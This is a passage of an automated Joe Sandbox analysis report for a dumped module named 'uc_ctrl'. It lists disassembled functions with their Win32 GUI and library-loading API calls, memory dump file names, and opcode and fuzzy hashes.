SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 6CB46D10
SendMessageW.USER32(?,0000120C,00000001,00000001), ref: 6CB46D3F
GetCapture.USER32 ref: 6CB46D68
ReleaseCapture.USER32 ref: 6CB46D72
GetClientRect.USER32(?,?), ref: 6CB46D8B
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 6CB46DE5

Part of subcall function 6CB48B51: __EH_prolog3_GS.LIBCMT ref: 6CB48B58
Part of subcall function 6CB48B51: IsRectEmpty.USER32(?), ref: 6CB48B73
Part of subcall function 6CB48B51: InvertRect.USER32(?,?), ref: 6CB48B89
Part of subcall function 6CB48B51: SetRectEmpty.USER32(?), ref: 6CB48B96

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$Capture$ClientEmptyMessageMetricsReleaseSendSystem$H_prolog3_InvertRedrawWindow
String ID:
API String ID: 174338775-0
Opcode ID: a52be06166519d8ed2d04b6e32cce406bd92b2c8e9eed55368a2ffbf87f1166d
Instruction ID: 155d36610f3ca9d11d65fbc2a0c5851d48242b873730d5d7eb5d2d1dc76cc10a
Opcode Fuzzy Hash: a52be06166519d8ed2d04b6e32cce406bd92b2c8e9eed55368a2ffbf87f1166d
Instruction Fuzzy Hash: C6516C71B00619AFCF09CFB8C9849AEBBB5FF49314F144269E815A7740DB30AE15DB90

Function 6CB34A30 Relevance: 16.6, APIs: 11, Instructions: 140COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6CB34A37
FindResourceW.KERNEL32(?,00000000,00000005), ref: 6CB34A7B
LoadResource.KERNEL32(?,00000000), ref: 6CB34A83

Part of subcall function 6CB2744F: UnhookWindowsHookEx.USER32(?), ref: 6CB27479

LockResource.KERNEL32(?), ref: 6CB34A93
GetDesktopWindow.USER32 ref: 6CB34ACA
IsWindowEnabled.USER32(00000000), ref: 6CB34AD5
EnableWindow.USER32(00000000,00000000), ref: 6CB34AE1

Part of subcall function 6CB2D728: IsWindowEnabled.USER32(?), ref: 6CB2D733

Part of subcall function 6CB2D500: EnableWindow.USER32(?,00000000), ref: 6CB2D511

EnableWindow.USER32(00000000,00000001), ref: 6CB34BC4
GetActiveWindow.USER32 ref: 6CB34BCE
SetActiveWindow.USER32(00000000,?,?,?,?,?,00000000), ref: 6CB34BDA
FreeResource.KERNEL32(?,?,?,?,?,?,00000000), ref: 6CB34C03

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
String ID:
API String ID: 964565984-0
Opcode ID: 167ee03062146abddab4befb92c98d588c1bea1f33608e229079b2840b2a95c1
Instruction ID: e611cedda9f168c40c76c171e4dc0826153dd47e5759944513344ce87141d92e
Opcode Fuzzy Hash: 167ee03062146abddab4befb92c98d588c1bea1f33608e229079b2840b2a95c1
Instruction Fuzzy Hash: C051CE30A012659BCF019FA4C948BEEBFB5FF09319F141119E919B3B80EB369805CFA5

Function 6CB243FA Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 399windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB24404

Part of subcall function 6CB1A044: __EH_prolog3.LIBCMT ref: 6CB1A0F2

Part of subcall function 6CB23576: __EH_prolog3.LIBCMT ref: 6CB2360A

SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6CB245F4
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6CB247BD
InvalidateRect.USER32(?,00000000,00000001), ref: 6CB247E2
UpdateWindow.USER32(?), ref: 6CB24803
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6CB248BD
InvalidateRect.USER32(?,00000000,00000001), ref: 6CB248E2
UpdateWindow.USER32(?), ref: 6CB24903

Strings

:/\, xrefs: 6CB2463D

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$H_prolog3InvalidateRectUpdateWindow$H_prolog3_
String ID: :/\
API String ID: 685702388-2793184486
Opcode ID: 9c10ca4958e9874a6e5b7f00db707e391baf5092bdf0f2f5bed5da196661d441
Instruction ID: c44c2b08d1b2cd28dbb0da66048b121237952919ac476121dceae83e113d4f4c
Opcode Fuzzy Hash: 9c10ca4958e9874a6e5b7f00db707e391baf5092bdf0f2f5bed5da196661d441
Instruction Fuzzy Hash: ADF14D71A041549FCB14EF24CC98BEDB7B6AF84308F1501E8D51AAB7A1DB38AE49CF15

Function 6CB49911 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000104B,00000000,?), ref: 6CB49946
SHGetDesktopFolder.SHELL32(?), ref: 6CB4997E
CreatePopupMenu.USER32 ref: 6CB49A16
GetMenuDefaultItem.USER32(00000000,00000000,00000000), ref: 6CB49A50
GetParent.USER32(?), ref: 6CB49A76
GetParent.USER32(?), ref: 6CB49AC7
GetParent.USER32(?), ref: 6CB49ADA
SendMessageW.USER32(?,00000000,00000000,00000000), ref: 6CB49AF2

Strings

$, xrefs: 6CB49A6C

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Parent$MenuMessageSend$CreateDefaultDesktopFolderItemPopup
String ID: $
API String ID: 4265152492-3993045852
Opcode ID: 996244f0b00ed7e6d75069121b7028bf1f96b838b50b3862f33a0472f6d579b5
Instruction ID: 3fd2b8e577fac17a657bba82fe32b90426117b8283d5d0c1dd17bee9b536a55f
Opcode Fuzzy Hash: 996244f0b00ed7e6d75069121b7028bf1f96b838b50b3862f33a0472f6d579b5
Instruction Fuzzy Hash: 12519A71F10255AFDF00DFA8C988AAEBBBCFF09314F004159E916A7654EB74E910CBA5

Function 6CB2BAA3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6CB2BAAA
GetPropW.USER32(?,AfxOldWndProc423), ref: 6CB2BAC1
CallWindowProcW.USER32(?,?,00000110,?,?), ref: 6CB2BB25

Part of subcall function 6CB2C007: GetWindowRect.USER32(?,?), ref: 6CB2C048
Part of subcall function 6CB2C007: GetWindow.USER32(?,00000004), ref: 6CB2C065

SetWindowLongW.USER32(?,000000FC,00000000), ref: 6CB2BB45
RemovePropW.USER32(?,AfxOldWndProc423), ref: 6CB2BB52
GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6CB2BB59
GlobalDeleteAtom.KERNEL32(?), ref: 6CB2BB63

Part of subcall function 6CB2C0B3: GetWindowRect.USER32(?,?), ref: 6CB2C0C0

CallWindowProcW.USER32(?,?,?,?,?), ref: 6CB2BBBA

Strings

AfxOldWndProc423, xrefs: 6CB2BAB5, 6CB2BB4B, 6CB2BB50, 6CB2BB58

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catch_LongRemove
String ID: AfxOldWndProc423
API String ID: 3351853316-1060338832
Opcode ID: 7de5010ce52b2cdab6e69260d66b5975c015ce10a0ed1c5563a5dd1da4e33767
Instruction ID: e8bfe1f328746602225257e464031448d3f8f6ad20167dcee5798e69ed487b77
Opcode Fuzzy Hash: 7de5010ce52b2cdab6e69260d66b5975c015ce10a0ed1c5563a5dd1da4e33767
Instruction Fuzzy Hash: 85318FB1D11258ABCF059FB8CD58CFFBEB8EF0A314B10450AF916B3A50DB3999108B64

Function 6CB20D03 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 74libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6CB20D29
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6CB20D39
EncodePointer.KERNEL32(00000000), ref: 6CB20D42
DecodePointer.KERNEL32(00000000), ref: 6CB20D50
LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 6CB20D64
GetSystemDirectoryW.KERNEL32(?,00000105), ref: 6CB20D79

Strings

kernel32.dll, xrefs: 6CB20D24
\, xrefs: 6CB20D87
SetDefaultDllDirectories, xrefs: 6CB20D33

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressDecodeDirectoryEncodeHandleLibraryLoadModuleProcSystem
String ID: SetDefaultDllDirectories$\$kernel32.dll
API String ID: 4227638471-3881611067
Opcode ID: 663658149726e29810bcfa4293d9ac8ebfa538d64b37edd48507fb193613cf21
Instruction ID: 4d5eb430f09c9122598b937a255c72e79b03004178b4acb51cec55b25641e2ab
Opcode Fuzzy Hash: 663658149726e29810bcfa4293d9ac8ebfa538d64b37edd48507fb193613cf21
Instruction Fuzzy Hash: 0C21F971A032A8ABDB109A759C5CFEB3FFCEB06754F440569BD08D3940EB38E5458791

Function 6CB42471 Relevance: 15.4, APIs: 10, Instructions: 359windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB42478

Part of subcall function 6CB2D632: GetWindowLongW.USER32(?,000000F0), ref: 6CB2D63F

SendMessageW.USER32(?,000000B0,?,?), ref: 6CB424BD
MessageBeep.USER32(000000FF), ref: 6CB42544
SendMessageW.USER32(?,000000C2,00000001,00000000), ref: 6CB425BB
SendMessageW.USER32(?,000000B0,?,?), ref: 6CB425FB
SendMessageW.USER32(?,000000B0,?,?), ref: 6CB42671
MessageBeep.USER32(000000FF), ref: 6CB42728
SendMessageW.USER32(?,000000C2,00000001,?), ref: 6CB427EC

Part of subcall function 6CB41438: __EH_prolog3_GS.LIBCMT ref: 6CB4143F
Part of subcall function 6CB41438: _wcslen.LIBCMT ref: 6CB41485

SendMessageW.USER32(?,000000B0,?,?), ref: 6CB42856

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message$Send$Beep$H_prolog3H_prolog3_LongWindow_wcslen
String ID:
API String ID: 108462914-0
Opcode ID: 4c0d4d23780af2e6ed2726fe9ca99a7eca98aa53029258c887a7e9733ca18332
Instruction ID: 69c82f68a8300fc5314e5270898a50103a192a31f06d8a124c30c11edfe25d2a
Opcode Fuzzy Hash: 4c0d4d23780af2e6ed2726fe9ca99a7eca98aa53029258c887a7e9733ca18332
Instruction Fuzzy Hash: 10D16871E0915AABCF05DFA4C888EEEB7B9FF48314F148119E411E3A94DB34A905EB61

Function 6CB42049 Relevance: 15.4, APIs: 10, Instructions: 355windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB42050
SendMessageW.USER32(?,000000B0,?,?), ref: 6CB4206B
SendMessageW.USER32(?,000000B0,?,?), ref: 6CB4207D
MessageBeep.USER32(000000FF), ref: 6CB420F8
SendMessageW.USER32(?,000000B0,?,?), ref: 6CB42298
SendMessageW.USER32(?,000000C2,00000001,?), ref: 6CB42242

Part of subcall function 6CB1CD0B: RegCloseKey.ADVAPI32(?,?,Function_0002C806), ref: 6CB1CD3A

MessageBeep.USER32(000000FF), ref: 6CB4232B
SendMessageW.USER32(?,000000C2,00000001,?), ref: 6CB423E3
SendMessageW.USER32(?,000000B0,?,?), ref: 6CB4243A
MessageBeep.USER32(000000FF), ref: 6CB42454

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message$Send$Beep$CloseH_prolog3
String ID:
API String ID: 705559962-0
Opcode ID: 9aedb85e27a73dd13123acd661c579b118779251cc03a93c9ffd83c5a259e76b
Instruction ID: 7339c5f3e6f6e405cb8ccc94a36df05c2ffcda566dc4f364b8361f5b9f1dedcb
Opcode Fuzzy Hash: 9aedb85e27a73dd13123acd661c579b118779251cc03a93c9ffd83c5a259e76b
Instruction Fuzzy Hash: EAD15F71E08159ABCF05DFA4C884EFEBBB9FF08304F148159E511E7A84DB34A949DBA1

Function 6CB3E7AB Relevance: 15.3, APIs: 10, Instructions: 330windowCOMMON

Download Yara Rule

APIs

RealizePalette.GDI32(?), ref: 6CB3E7F3
InflateRect.USER32(?,000000FE,000000FE), ref: 6CB3E8F0

Part of subcall function 6CB3EF83: __EH_prolog3.LIBCMT ref: 6CB3EF8A
Part of subcall function 6CB3EF83: GetSystemPaletteEntries.GDI32(?,00000000,00000100,00000004), ref: 6CB3F000
Part of subcall function 6CB3EF83: CreatePalette.GDI32(00000000), ref: 6CB3F04D

InflateRect.USER32(?,000000FF,000000FF), ref: 6CB3E919
InflateRect.USER32(?,000000FF,000000FF), ref: 6CB3E942
GetNearestPaletteIndex.GDI32(?,?), ref: 6CB3E96B
FillRect.USER32(?,?,?), ref: 6CB3E98D
InflateRect.USER32(?,000000FE,000000FE), ref: 6CB3E9B4
FillRect.USER32(?,?,-00000098), ref: 6CB3EA24
InflateRect.USER32(?,000000FF,000000FF), ref: 6CB3EA6F
InflateRect.USER32(?,000000FF,000000FF), ref: 6CB3EB37

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$Inflate$Palette$Fill$CreateEntriesH_prolog3IndexNearestRealizeSystem
String ID:
API String ID: 1028858568-0
Opcode ID: ebdbcd451fc59aa0a8d0188578767084fad6e16bd05d26f5f78b61ae8acdafac
Instruction ID: 584bf6c45a0f679d5f79dc8c3ae88de3b73eb905729d6312c2d27d56429a1abc
Opcode Fuzzy Hash: ebdbcd451fc59aa0a8d0188578767084fad6e16bd05d26f5f78b61ae8acdafac
Instruction Fuzzy Hash: CDC18371900159AFCF01DFA4C944ADEBBB6FF09314F115269E819BB6A0DB31AD09CF91

Function 6CBC877A Relevance: 15.3, APIs: 10, Instructions: 275COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6CBC87AE
GetWindowRect.USER32(?,00000000), ref: 6CBC8805
CopyRect.USER32(00000000,?), ref: 6CBC881D
PtInRect.USER32(?,00000000,?), ref: 6CBC8910
PtInRect.USER32(?,00000000,?), ref: 6CBC8942
PtInRect.USER32(?,00000000,?), ref: 6CBC897B
PtInRect.USER32(?,00000000,?), ref: 6CBC89A6
PtInRect.USER32(?,00000000,?), ref: 6CBC8A10
PtInRect.USER32(?,00000000,?), ref: 6CBC8A44
PtInRect.USER32(?,00000000,?), ref: 6CBC8A88

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$CopyParentWindow
String ID:
API String ID: 642869531-0
Opcode ID: 9e576cf20003c595fdc2f0be94bc7d92580fa4d51c5554978d6b7983aea8d885
Instruction ID: 7eaf0297afc745e78090cdfbf65d44c6f7609c2e1875ad281bf452ae0a07d25e
Opcode Fuzzy Hash: 9e576cf20003c595fdc2f0be94bc7d92580fa4d51c5554978d6b7983aea8d885
Instruction Fuzzy Hash: F9B1C272E012199FDF01CFA8C984AEEBBF9FB08315F14416AE914E7654E775DA00CB92

Function 6CB5A993 Relevance: 15.2, APIs: 10, Instructions: 202COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB5A99D
GetObjectW.GDI32(?,00000018,?), ref: 6CB5A9C6

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3_Object
String ID:
API String ID: 2214263146-0
Opcode ID: 71c3b31625ec983a54e1cd7b6c680e4e06220a0b0766130951e6ee0c86c41813
Instruction ID: c23c713a649f0e20a4631b0b017e0b5b4ecb6dfdc8dbbec8d7dff310c9903124
Opcode Fuzzy Hash: 71c3b31625ec983a54e1cd7b6c680e4e06220a0b0766130951e6ee0c86c41813
Instruction Fuzzy Hash: 67815D75E002698BDF20CFA9C884AAEBBB6FF49304F544169E909B7741DB309D95CF60

Function 6CB44361 Relevance: 15.2, APIs: 10, Instructions: 202windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB4436B

Part of subcall function 6CB25025: __EH_prolog3.LIBCMT ref: 6CB2502C
Part of subcall function 6CB25025: GetDC.USER32(00000000), ref: 6CB25058

Part of subcall function 6CB4869F: GetStockObject.GDI32(00000011), ref: 6CB486AE
Part of subcall function 6CB4869F: SelectObject.GDI32(?,?), ref: 6CB486C0

GetTextMetricsW.GDI32(?,?), ref: 6CB443A7
GetClientRect.USER32(00000000,00000000), ref: 6CB443D2
GetStockObject.GDI32(00000011), ref: 6CB443FF
SendMessageW.USER32(?,00000030,?,00000000), ref: 6CB44422
SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 6CB44497
SendMessageW.USER32(?,0000120C,00000001,00000001), ref: 6CB444CC
SelectObject.GDI32(?,?), ref: 6CB444F7
GetSystemMetrics.USER32(00000015), ref: 6CB44562
RedrawWindow.USER32(00000000,00000000,00000000,00000105,00000000,00000000,00000000,00000000,00000000,00000014), ref: 6CB445F7

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
